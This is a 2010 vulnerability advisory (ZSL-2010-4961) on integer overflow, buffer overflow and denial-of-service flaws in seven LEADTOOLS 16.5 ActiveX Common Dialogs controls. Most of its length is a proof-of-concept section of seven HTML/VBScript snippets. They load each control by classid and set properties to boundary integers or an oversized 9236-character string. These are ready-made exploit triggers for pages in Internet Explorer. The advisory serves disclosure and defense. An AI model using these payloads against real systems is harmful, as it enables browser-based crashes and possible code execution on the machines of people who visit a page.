1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities Vendor: LEAD Technologies, Inc. Product Web Page: http://www.leadtools.com Affected version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in different objects included in the Common Dialogs class. Vulnerable Objects/OCX Dialogs (Win32): 1. ActiveX Common Dialogs (Web) --------------------> LtocxWebDlgu.dll 2. ActiveX Common Dialogs (Effects) ----------------> LtocxEfxDlgu.dll 3. ActiveX Common Dialogs (Image) ------------------> LtocxImgDlgu.dll 4. ActiveX Common Dialogs (Image Effects) ----------> LtocxImgEfxDlgu.dll 5. ActiveX Common Dialogs (Image Document)----------> LtocxImgDocDlgu.dll 6. ActiveX Common Dialogs (Color) ------------------> LtocxClrDlgu.dll 7. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll - RegKey Safe for Script: True - RegKey Safe for Init: True Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4961 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php ############################################################## Proof of Concept: ############################################################## 1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL): ------------------------------------------------------ <object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll" prototype= "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL): ------------------------------------------------------ <object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll" prototype= "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL): ------------------------------------------------------ <object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll" prototype= "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL): ------------------------------------------------------ <object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll" prototype= "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U" argCount = 1 arg1=-2147483647 target.Bitmap = arg1 </script> 5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL): ------------------------------------------------------ <object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll" prototype= "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL): ------------------------------------------------------ <object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll" prototype= "Property Let UserPalette ( ByVal iIndex As Integer ) As Long" memberName = "UserPalette" progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U" argCount = 2 arg1=1 arg2=-2147483647 target.UserPalette(arg1 ) = arg2 </script> 7. (File, LtocxFileDlgu.dll / LTRDFU.DLL): ------------------------------------------------------ <object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll" prototype= "Property Let DestinationPath As String" memberName = "DestinationPath" progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U" argCount = 1 arg1=String(9236, "A") target.DestinationPath = arg1 </script> |